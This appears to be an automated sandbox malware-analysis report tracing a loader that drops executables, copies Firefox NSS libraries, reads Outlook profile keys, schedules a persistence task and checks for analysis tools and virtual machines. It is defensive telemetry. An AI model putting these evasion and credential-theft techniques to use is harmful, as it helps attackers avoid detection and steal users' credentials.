                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: pcacli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dui70.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwrite.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.ui.immersive.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47mrm.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uianimation.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxgi.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d11.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d10warp.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxcore.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dcomp.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                        Source: So7a8eQerR.exeStatic file information: File size 1850368 > 1048576
                        Source: So7a8eQerR.exeStatic PE information: Raw size of ohmzqnep is bigger than: 0x100000 < 0x192400
                        Source: Binary string: mozglue.pdbP source: 37664d9843.exe, 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmp, 586ef238b2.exe, 0000000F.00000002.3360531136.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, mozglue.dll.4.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr
                        Source: Binary string: nss3.pdb@ source: 37664d9843.exe, 00000004.00000002.1984622236.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, 586ef238b2.exe, 0000000F.00000002.3360962751.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.4.dr, vcruntime140[1].dll.4.dr, vcruntime140[1].dll.15.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.4.dr, msvcp140[1].dll.15.dr
                        Source: Binary string: nss3.pdb source: 37664d9843.exe, 00000004.00000002.1984622236.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, 586ef238b2.exe, 0000000F.00000002.3360962751.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.dr
                        Source: Binary string: mozglue.pdb source: 37664d9843.exe, 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmp, 586ef238b2.exe, 0000000F.00000002.3360531136.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, mozglue.dll.4.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeUnpacked PE file: 0.2.So7a8eQerR.exe.950000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 1.2.explorti.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 2.2.explorti.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 3.2.explorti.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeUnpacked PE file: 4.2.37664d9843.exe.ce0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeUnpacked PE file: 11.2.GIEHIDHJDB.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeUnpacked PE file: 15.2.586ef238b2.exe.200000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeUnpacked PE file: 20.2.CBFIIEHJDB.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0BC410 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_6C0BC410
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                        Source: explorti.exe.0.drStatic PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
                        Source: amadka[1].exe.4.drStatic PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
                        Source: random[1].exe.3.drStatic PE information: real checksum: 0x0 should be: 0x27638e
                        Source: 586ef238b2.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x27638e
                        Source: So7a8eQerR.exeStatic PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
                        Source: 37664d9843.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x27638e
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
                        Source: So7a8eQerR.exeStatic PE information: section name:
                        Source: So7a8eQerR.exeStatic PE information: section name: .idata
                        Source: So7a8eQerR.exeStatic PE information: section name:
                        Source: So7a8eQerR.exeStatic PE information: section name: ohmzqnep
                        Source: So7a8eQerR.exeStatic PE information: section name: ebipawoj
                        Source: So7a8eQerR.exeStatic PE information: section name: .taggant
                        Source: explorti.exe.0.drStatic PE information: section name:
                        Source: explorti.exe.0.drStatic PE information: section name: .idata
                        Source: explorti.exe.0.drStatic PE information: section name:
                        Source: explorti.exe.0.drStatic PE information: section name: ohmzqnep
                        Source: explorti.exe.0.drStatic PE information: section name: ebipawoj
                        Source: explorti.exe.0.drStatic PE information: section name: .taggant
                        Source: random[1].exe.3.drStatic PE information: section name:
                        Source: random[1].exe.3.drStatic PE information: section name:
                        Source: random[1].exe.3.drStatic PE information: section name:
                        Source: random[1].exe.3.drStatic PE information: section name:
                        Source: random[1].exe.3.drStatic PE information: section name:
                        Source: 37664d9843.exe.3.drStatic PE information: section name:
                        Source: 37664d9843.exe.3.drStatic PE information: section name:
                        Source: 37664d9843.exe.3.drStatic PE information: section name:
                        Source: 37664d9843.exe.3.drStatic PE information: section name:
                        Source: 37664d9843.exe.3.drStatic PE information: section name:
                        Source: 586ef238b2.exe.3.drStatic PE information: section name:
                        Source: 586ef238b2.exe.3.drStatic PE information: section name:
                        Source: 586ef238b2.exe.3.drStatic PE information: section name:
                        Source: 586ef238b2.exe.3.drStatic PE information: section name:
                        Source: 586ef238b2.exe.3.drStatic PE information: section name:
                        Source: freebl3.dll.4.drStatic PE information: section name: .00cfg
                        Source: freebl3[1].dll.4.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.4.drStatic PE information: section name: .00cfg
                        Source: mozglue[1].dll.4.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.4.drStatic PE information: section name: .didat
                        Source: msvcp140[1].dll.4.drStatic PE information: section name: .didat
                        Source: nss3.dll.4.drStatic PE information: section name: .00cfg
                        Source: nss3[1].dll.4.drStatic PE information: section name: .00cfg
                        Source: softokn3.dll.4.drStatic PE information: section name: .00cfg
                        Source: softokn3[1].dll.4.drStatic PE information: section name: .00cfg
                        Source: amadka[1].exe.4.drStatic PE information: section name:
                        Source: amadka[1].exe.4.drStatic PE information: section name: .idata
                        Source: amadka[1].exe.4.drStatic PE information: section name:
                        Source: amadka[1].exe.4.drStatic PE information: section name: ohmzqnep
                        Source: amadka[1].exe.4.drStatic PE information: section name: ebipawoj
                        Source: amadka[1].exe.4.drStatic PE information: section name: .taggant
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: section name:
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: section name: .idata
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: section name:
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: section name: ohmzqnep
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: section name: ebipawoj
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: section name: .taggant
                        Source: freebl3[1].dll.15.drStatic PE information: section name: .00cfg
                        Source: mozglue[1].dll.15.drStatic PE information: section name: .00cfg
                        Source: msvcp140[1].dll.15.drStatic PE information: section name: .didat
                        Source: nss3[1].dll.15.drStatic PE information: section name: .00cfg
                        Source: softokn3[1].dll.15.drStatic PE information: section name: .00cfg
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: section name:
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: section name: .idata
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: section name:
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: section name: ohmzqnep
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: section name: ebipawoj
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: section name: .taggant
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 3_2_005DD82C push ecx; ret 3_2_005DD83F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C08B536 push ecx; ret 4_2_6C08B549
                        Source: So7a8eQerR.exeStatic PE information: section name: entropy: 7.987398323235003
                        Source: So7a8eQerR.exeStatic PE information: section name: ohmzqnep entropy: 7.952574384600115
                        Source: explorti.exe.0.drStatic PE information: section name: entropy: 7.987398323235003
                        Source: explorti.exe.0.drStatic PE information: section name: ohmzqnep entropy: 7.952574384600115
                        Source: random[1].exe.3.drStatic PE information: section name: entropy: 7.995466725480933
                        Source: random[1].exe.3.drStatic PE information: section name: entropy: 7.977842582826075
                        Source: random[1].exe.3.drStatic PE information: section name: entropy: 7.9508605124369
                        Source: 37664d9843.exe.3.drStatic PE information: section name: entropy: 7.995466725480933
                        Source: 37664d9843.exe.3.drStatic PE information: section name: entropy: 7.977842582826075
                        Source: 37664d9843.exe.3.drStatic PE information: section name: entropy: 7.9508605124369
                        Source: 586ef238b2.exe.3.drStatic PE information: section name: entropy: 7.995466725480933
                        Source: 586ef238b2.exe.3.drStatic PE information: section name: entropy: 7.977842582826075
                        Source: 586ef238b2.exe.3.drStatic PE information: section name: entropy: 7.9508605124369
                        Source: amadka[1].exe.4.drStatic PE information: section name: entropy: 7.987398323235003
                        Source: amadka[1].exe.4.drStatic PE information: section name: ohmzqnep entropy: 7.952574384600115
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: section name: entropy: 7.987398323235003
                        Source: GIEHIDHJDB.exe.4.drStatic PE information: section name: ohmzqnep entropy: 7.952574384600115
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: section name: entropy: 7.987398323235003
                        Source: CBFIIEHJDB.exe.15.drStatic PE information: section name: ohmzqnep entropy: 7.952574384600115
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\amadka[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile created: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile created: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile created: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeWindow searched: window name: FilemonClass
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeWindow searched: window name: RegmonClass
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeWindow searched: window name: FilemonClass
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C0B55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_6C0B55F0
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
